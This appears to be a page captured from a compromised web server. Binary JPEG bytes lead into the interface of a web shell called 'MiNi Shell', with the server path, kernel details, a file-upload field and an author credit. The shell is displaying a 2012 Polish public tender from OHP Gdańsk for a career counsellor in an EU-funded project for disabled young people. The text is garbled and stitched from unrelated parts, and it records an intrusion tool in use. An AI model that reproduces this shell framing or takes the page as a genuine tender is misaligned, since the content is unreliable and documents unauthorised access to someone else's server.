JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/390676-N-2012.html

<p class="kh_header"><b>Gdańsk: Pełnienie funkcji doradcy zawodowego w projekcie Czas na Nas. Niepełnosprawni na rynku pracy współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL</b><br>
<b>Numer ogłoszenia: 390676 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/   http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji doradcy zawodowego w projekcie Czas na Nas. Niepełnosprawni na rynku pracy współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji: doradcy zawodowego  w projekcie: Czas na nas! Niepełnosprawni na rynku pracy w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.2., Poddziałanie 7.2.1. Przedmiotem zamówienia jest pełnienie funkcji doradcy zawodowego - zajęcia indywidualne z doradcą zawodowym.  

1.	Miejsce realizacji działań projektowych: Człuchów. 
2.	Wykonywanie zamówienia będzie odbywać się w czasie i terminie niezbędnym do realizacji zleconych zadań. 
3.	Realizacja zadań obejmuje:
A.	przeprowadzenie indywidualnych spotkań z uczestnikami projektu celem określenia
zainteresowań i predyspozycji zawodowych,
B.	opracowanie Indywidualnych Planów Działań dla każdego z uczestników, 
C.	sporządzenie listy  kursów zawodowych dobranych indywidualnie dla potrzeb uczestników oraz lokalnego rynku pracy;
D.	prowadzenie dokumentacji dotyczącej wykonywanych zadań,

4.	Miejsce realizacji działań projektowych: Człuchów, ul. Kusocińskiego 4 - Ośrodek Szkolenia i Wychowania OHP w terminach zgodnych z harmonogramem realizowanych zajęć, uzgodnionych z koordynatorem wojewódzkim projektu oraz koordynatorami terenowymi.
5.	Wykonywanie zadań obejmuje: zajęcia indywidualne - 4 godziny zegarowe na osobę (łącznie 15 osób).  Zamawiający udostępni bezpłatnie puste sale do przeprowadzeni zajęć.
6.	Przez 1 godzinę należy rozumieć 60 min. (godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 60 minut)
7.	Zamawiający może unieważnić umowę na wykonywanie przedmiotu zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej i budżetu państwa, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostaną mu przyznane. 
8.	Zamawiający zastrzega sobie oraz uprawnionym instytucjom prawo wglądu we wszystkie dokumenty Wykonawcy, związane z realizacją projektu, w tym dokumenty elektroniczne                 i  finansowe, do dnia 31 grudnia 2020 r.
9.	W przypadku konieczności pokrycia składek płatnika na ubezpieczenie społeczne przez Zamawiającego w ramach niniejszej umowy, Zamawiający będzie miesięcznie odliczał składki od wynagrodzenia przedstawionego przez wykonawcę w ofercie. 
10.	W przypadku wykonywania zamówienia przez firmy lub osobę fizyczną: zmiana osoby realizującej zamówienie w imieniu Wykonawcy w trakcie realizacji zamówienia możliwa jest wyłącznie za pisemną zgodą Wykonawcy.
11.	Po wykonaniu przedmiotu umowy na koniec miesiąca Wykonawca i przedstawiciel Zamawiającego spisują protokół odbioru końcowego zadania (załącznik nr D). Pozytywna opinia na temat wykonania zlecenia jest warunkiem dokonania płatności za zlecenie.
12.	W przypadku realizacji zamówienia przez osoby fizyczne, dana osoba fizyczna zobowiązuje się do składania co miesiąc rachunku według wzoru z załącznika nr A.
13.	W przypadku osób fizycznych dana osoba będzie miała obowiązek wypełniać co:
A.	miesięczną kartę pracy załącznik nr B (wypełnia gdy pracuje przy realizacji innych projektów POKL)
B.	protokół odbioru zadania końcowego - załącznik nr D
14.	Przed zawarciem umowy z osobą fizyczną dana osoba wypełni i podpisze
A.	oświadczenie do celów podatkowych załącznik nr C
B.	oświadczenie o zatrudnieniu przy innych projektach POKL - załącznik nr E
15.	Wykonawca zobowiązuje się dostarczać do siedziby zamawiającego fakturę rachunek za wykonany przedmiot zamówienia z kompletem poprawnie wypełnionych dokumentów projektowych do Zamawiającego najpóźniej do 17 listopada 2012 r. 
16.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych którą wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 5.
17.	W formularzu oferty Wykonawca musi zaznaczyć swój status na rynku pracy: pracujący, bezrobotny, rencista, emeryt i czy otrzymuje co najmniej minimalne wynagrodzenie ze stosunku pracy.
18.	Na uzasadniony wniosek Zamawiającego, Wykonawca zobowiązany jest zastąpić dotychczasowego nauczyciela lub instruktora innym nauczycielem lub instruktorem gwarantującym należyte i terminowe prowadzenie zajęć (kursów).
19.	Przed podpisaniem umowy Wykonawca zobowiązany będzie dostarczyć konspekt godzinowy dotyczący realizacji przedmiotu zamówienia z uwzględnieniem tematów ujętych w zakresie tematycznym zajęć przedstawionych w opisie przedmiotu zamówienia. Jeżeli Wykonawca nie dostarczy powyższego dokumentu - konspektu, Zamawiający potraktuje to jako uchylanie się Wykonawcy od podpisania umowy na warunkach określonych w ofercie. Jednocześnie działając na podstawie art. 94 ust. 3 ustawy Pzp. Zamawiający dokona wyboru oferty najkorzystniejszej z pośród pozostałych ofert bez przeprowadzenia ich ponownego badania i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1 ustawy Pzp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8, 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.A. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A.	wykształcenie wyższe z zakresu doradztwa zawodowego, lub wyższe + kursy/studia podyplomowe z zakresu doradztwa zawodowego. Przed podpisaniem umowy Wykonawca zobowiązany będzie dostarczyć/przedstawić zamawiającemu dokumenty osoby, która będzie prowadziła zajęcia potwierdzające w/w warunek (kopie dyplomu itp.)  
A.	minimum 1 rok doświadczenia. Przed podpisaniem umowy Wykonawca zobowiązany będzie dostarczyć/przedstawić zamawiającemu dokumenty osoby, która będzie prowadziła zajęcia potwierdzające w/w warunek
B.	doświadczenie w pracy z młodzieżą niepełnosprawną  (NALEŻY DOŁĄCZYĆ DO OFERTY oświadczenie wraz z opisem wykonywanej pracy na rzecz młodzieży niepełnosprawnej lub referencje)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.A. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.A. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 12.2.A. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp należy złożyć oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 Pzp, wg wzoru na Załączniku nr 3 do SIWZ. 
2.	W celu potwierdzenia spełniania warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp, do oferty należy dołączyć:
A.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, w związku z art. 44 ustawy Pzp, wzór oświadczenia stanowi Załączniku nr 2 do SIWZ.
B.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, będzie polegał na wiedzy i doświadczeniu i/lub na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp., niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnej wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału),
UWAGA: W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innego podmiotu i/lub będzie polegał na zasobach innego podmiotu i złoży w stosunku do tych warunków pisemne zobowiązanie o którym mowa powyżej - oznacza obowiązkowy udział innego podmiotu w realizacji części zamówienia.
3.	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 pkt 1-4 PzP składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.
4.	Dokumenty, oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu. 
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
6.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Przed zawarciem umowy z wykonawcami wspólnie składającymi ofertę należy przedstawić zamawiającemu stosowną umowę współpracy wykonawców
7.	Wykonawcy, występujący wspólnie składają jedną ofertę, przy czym:
A.	Załącznik nr 3 do SIWZ (Oświadczenie Wykonawcy o braku podstaw do wykluczenia) każdy z Wykonawców składa oddzielnie w formie oryginału i podpisuje we własnym imieniu. Dopuszcza się możliwość złożenia na jednym formularzu, w którym będą znajdować się podpisy umocowanych osób wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
B.	Załącznik nr 2 (Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu) Wykonawcy składają w formie oryginału i mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie), lub każdy z nich na osobnym dokumencie.
UWAGA: Do podmiotów wspólnie ubiegających się o zamówienie publiczne stosuje się te same przepisy co do pojedynczego wykonawcy. Odpowiednie ich stosowanie oznacza, że każdy uczestnik wspólnej oferty musi posiadać uprawnienia do wykonywania określonej działalności lub czynności i nie może podlegać wykluczeniu z postępowania. Natomiast przy ocenie spełniania warunków, brany jest pod uwagę łączny potencjał techniczny i kadrowy wykonawców (członków konsorcjum, członków spółki cywilnej) ich łączne kwalifikacje i doświadczenie oraz łączną sytuację ekonomiczną i finansową.
8.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć formę prawną konsorcjum zawiązanego w drodze umowy cywilnej. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie zawierające w swojej treści następujące postanowienia:
A.	określenie zasad reprezentacji i odpowiedzialności w sposób czytelny, nie budzący żadnej wątpliwości;
B.	określenie celu gospodarczego;
C.	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji  przedmiotu zamówienia i okres gwarancji;
D.	wykluczenie możliwości wypowiedzenia umowy przez któregokolwiek z jej członków do czasu wykonania zamówienia bez zgody Zamawiającego i upływu  okresu gwarancji;
E.	zakaz dokonywania zmian w umowie bez zgody Zamawiającego.
9.	Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana na podstawie przedłożonych oświadczeń i dokumentów wg formuły spełnia nie spełnia w oparciu o informacje zawarte w oświadczeniach wyszczególnionych w pkt. 12  niniejszej SIWZ.  Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
7.	W przypadku Wykonawców występujących wspólnie (konsorcjum), oprócz w/w dokumentów należy dołączyć:
A.	Pełnomocnictwo lidera - pełnomocnika do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie, a w szczególności do złożenia oferty lub do złożenia oferty i podpisania umów w imieniu konsorcjum. Fakt ustanowienia pełnomocnika musi wynikać z załączonych do oferty dokumentów (np. pełnomocnictwa). Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu nazwa i adres Wykonawcy należy wpisać oprócz danych pełnomocnika konsorcjum, również dane dotyczące wszystkich członków konsorcjum - wszystkich Wykonawców składających ofertę wspólną. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem wymienionym w pełnomocnictwie występującym jako reprezentant pozostałych konsorcjantów.
B.	Oświadczenie wszystkich członków konsorcjum o ich odpowiedzialności solidarnej za zobowiązania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>20.	Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
A.	Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
B.	Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
C.	W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
D.	Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
E.	Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
F.	Zmiana osoby realizującej zamówienie (doradcy zawodowego, prawnika) w imieniu Wykonawcy w trakcie realizacji zamówienia możliwa jest wyłącznie za pisemną zgodą Wykonawcy. (Osoba która zastąpi doradcę zawodowego, prawnika musi dysponować kwalifikacjami przedstawionymi w niniejszej SIWZ).
G.	zmiany instruktora, zmiana osoby realizującej zamówienie w imieniu Wykonawcy w trakcie realizacji zamówienia możliwa jest wyłącznie za pisemną zgodą Zamawiającego lub na wniosek zamawiającego.
H.	W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.ohp.pl. http://www.pomorskie.eu/pl/bip/ohp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  
w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. 
ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie, Zamawiającego, ul. J. Uphagena 27, 
    		80-237 Gdańsk, (sekretariat - pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Czas na Nas. Niepełnosprawni na rynku pracy współfinansowany przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com